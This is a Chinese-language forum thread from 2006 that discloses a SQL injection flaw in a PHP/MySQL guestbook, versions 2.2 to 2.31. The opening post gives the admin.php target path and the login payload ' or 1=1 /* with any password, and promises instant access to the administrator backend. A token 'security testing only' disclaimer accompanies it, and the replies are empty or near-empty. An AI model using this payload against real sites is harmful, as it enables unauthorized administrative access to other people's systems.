提醒(5) 其他功能 論壇服務 精華帖 最新帖
主題 : guestbook漏洞公布
鱼子酱 離線
級別: VIP會員

UID: 650
精華: 1
發帖: 6315
漁樂幣: 273953 元
威望: 2851 點
貢獻值: 58 點
娛樂金幣: 0 元
在線時間: 1928(時)
註冊時間: 2005-11-14
最後登錄: 2007-09-26
樓主  發表於: 2006-01-02   

guestbook漏洞公布

guestbook漏洞公布

guestbook基于(php,mysql)2.2版到2.31版的最新sql 注入漏洞公布如下。

通过构造语句可轻松进入管理员后台,有点像当年的asp经典的'or''=',
希望大家不要做坏事,仅供安全检测,一切后果与鱼子酱无关。

攻击方式:

例如:
攻击目标为:
http://www.xxxx.com/[guestbook目标]/admin.php


username:' or 1=1 /*
password:(任意)(或不填)


哈哈就进去了。。。。
評價一下你瀏覽此帖子的感受

讚一個

好收獲

可憐喲

真攪笑

好犀利

又食蕉

冇意見

又灌水
鱼子酱 離線
級別: VIP會員

UID: 650
精華: 1
發帖: 6315
漁樂幣: 273953 元
威望: 2851 點
貢獻值: 58 點
娛樂金幣: 0 元
在線時間: 1928(時)
註冊時間: 2005-11-14
最後登錄: 2007-09-26
1樓  發表於: 2006-01-02   
没人有兴趣的话就不再发类似内容的帖了~
hungjay2004 離線
級別: VIP會員
UID: 512
精華: 0
發帖: 950
漁樂幣: 50 元
威望: 616 點
貢獻值: 32 點
娛樂金幣: 0 元
在線時間: 144(時)
註冊時間: 2005-10-04
最後登錄: 2012-12-03
2樓  發表於: 2006-01-02   
鱼子酱 離線
級別: VIP會員

UID: 650
精華: 1
發帖: 6315
漁樂幣: 273953 元
威望: 2851 點
貢獻值: 58 點
娛樂金幣: 0 元
在線時間: 1928(時)
註冊時間: 2005-11-14
最後登錄: 2007-09-26
3樓  發表於: 2006-01-02   
描述
快速回覆

驗證問題:
請複製中文【好】字,貼在驗證框內 正確答案:好
按"Ctrl+Enter"直接提交